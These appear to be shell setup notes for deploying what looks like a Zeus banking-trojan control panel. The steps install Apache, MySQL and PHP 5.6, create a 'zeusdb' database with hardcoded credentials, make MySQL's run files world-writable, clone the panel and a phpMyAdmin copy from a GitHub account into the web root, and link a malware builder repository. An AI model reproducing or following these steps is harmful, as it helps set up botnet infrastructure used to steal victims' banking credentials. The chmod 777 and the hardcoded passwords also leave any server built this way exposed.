
su - root

sudo apt-get update

apt install nano git 

sudo apt -y install software-properties-common

sudo add-apt-repository ppa:ondrej/php

sudo apt-get update
sudo apt -y install apache2
sudo apt install mysql-server
sudo apt install php5.6 php5.6-mysql php5.6-dev php5.6-common php5.6-fpm php5.6-mbstring php5.6-json php5.6-curl php5.6-zip php5.6-xmlrpc php5.6-xsl php5.6-recode
_________________
MYSQL;
__________________
service mysql stop
service mysql start
cd /var/run
chmod 777 mysqld && cd mysqld && chmod 777 *.*
cd ~
mysql -u root -p
create database zeusdb;
CREATE USER 'zeususer'@'127.0.0.1' IDENTIFIED BY 'zeusgod@1234';
GRANT ALL PRIVILEGES ON * . * TO 'zeususer'@'127.0.0.1';
FLUSH PRIVILEGES;
ctrl + D
__________________
service apache2 restart

cd /var/www/html


git clone https://github.com/h4ckti2/zeus3
git clone https://github.com/h4ckti2/phpmyadminzeus2
mv phpmyadminzeus2 phpmyadmin
cd zeus3
mv *.* /var/www/html
mv install /var/www/html
mv system /var/www/html
mv theme /var/www/html
browser http://host.com.ua.ru/install 
_________
install

_________
builder
 https://github.com/h4ckti2/zeusbuidler3